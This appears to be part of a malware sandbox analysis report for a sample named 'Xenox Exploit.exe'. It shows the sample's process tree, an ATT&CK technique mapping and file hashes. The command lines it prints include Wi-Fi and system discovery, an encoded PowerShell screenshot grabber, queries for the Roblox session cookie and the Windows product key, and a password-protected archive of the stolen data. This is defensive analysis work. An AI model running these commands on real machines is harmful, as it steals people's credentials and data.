    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2756
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:1264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4004
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:2032
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:5528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:8
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:5308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:1028
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:3132
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:6080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5368
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qusertbt\qusertbt.cmdline"
        5⤵
        
        PID:2164
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7BA8.tmp" "c:\Users\Admin\AppData\Local\Temp\qusertbt\CSCA4CF694EC02B40EB84DF8AEC2E6CBE4.TMP"
        6⤵
        
        PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3536
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:1768
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:6052
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3588
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:1236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3428
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5104
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:5884
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1464
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1584
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:4988
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1056
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:5628
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:2992
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI55562\rar.exe a -r -hp"kaneki" "C:\Users\Admin\AppData\Local\Temp\F8o9V.zip" *"
    3⤵
    PID:2372
  - - C:\Users\Admin\AppData\Local\Temp\_MEI55562\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI55562\rar.exe a -r -hp"kaneki" "C:\Users\Admin\AppData\Local\Temp\F8o9V.zip" *
      4⤵
      Executes dropped EXE
      PID:2700
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:3092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:4328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4484
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5852
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:1276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:5896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:5000
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:5220
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3920

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:2600
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:6088
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1996 -parentBuildID 20240401114208 -prefsHandle 1928 -prefMapHandle 1920 -prefsLen 23839 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {307a08ad-dfb8-49cc-b47f-8f1df9e53012} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" gpu
    3⤵
    PID:5240
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2408 -parentBuildID 20240401114208 -prefsHandle 2384 -prefMapHandle 2380 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e1ca866f-5214-4251-81bf-7c0f9eaa0880} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" socket
    3⤵
    - Checks processor information in registry
    PID:4172
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2904 -childID 1 -isForBrowser -prefsHandle 2908 -prefMapHandle 2932 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {385d83ea-ee5b-4c2c-8043-6c8fb5670cdf} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" tab
    3⤵
    PID:5332
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3676 -childID 2 -isForBrowser -prefsHandle 3668 -prefMapHandle 3664 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e9cc717-048d-4044-a6d4-b8de3365617b} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" tab
    3⤵
    PID:6016
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4764 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4692 -prefMapHandle 4832 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b978183f-37b7-4749-a36a-495c08ff5973} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" utility
    3⤵
    - Checks processor information in registry
    PID:6028
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5492 -childID 3 -isForBrowser -prefsHandle 5480 -prefMapHandle 5476 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2209cf18-0b22-4df6-be07-3ec4bb773835} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" tab
    3⤵
    PID:5880
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5648 -childID 4 -isForBrowser -prefsHandle 5600 -prefMapHandle 5500 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a81572ac-23d9-43d4-b874-af2fe6b81973} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" tab
    3⤵
    PID:712
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5820 -childID 5 -isForBrowser -prefsHandle 5900 -prefMapHandle 5896 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 908 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5381dd90-d1d9-480b-98d8-393ea62f9b40} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" tab
    3⤵
    PID:1432

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0f59cccd39a3694e0e6dfd44d0fa76d

SHA1
fccd7911d463041e1168431df8823e4c4ea387c1

SHA256
70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

SHA512
5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
73fcdfef85580ce2ff184c4075fade28

SHA1
0881fe3066ccb452df0c7fdd1b14166f284d7334

SHA256
3a0faf79cdfa77a301682fafb853fb6435a94fda4808fac99da34822b551f7d5

SHA512
14b6ab328ff5c7eb0f85689cb49b90cd04f1d3668230748712eb6e7635da17c219eace8e7caddc6a59c0ef5fb602eadd4e8dc2b305e6cf767d305237cd616d74

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c75707808b00ed0d5d868fa0e7e8f12e

SHA1
d8d147ce1a61047cac1e1b73130f8ec1224c0238

SHA256
65b8ac093e16917e634f5797dec78c96f7e2c00a5d4d06765c16ed2d383f8b4e

SHA512
5cbbe227f0f1e115fc79e5a6a865d1e8dad28b086d82cdaff983b4b1603a55e1023eadb74f5a623a79ee6e3f85848dd48000a715be6f173c51b1ce713a265d4a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
17afe23fff4dba819dd8927c84b1e9ab

SHA1
aac9348a011dac054db86daacb01dfab6f60b0b5

SHA256
61aa193348d6532abae63d019441dd3c029985a28cdb46b91996dfe9a59c1c4a

SHA512
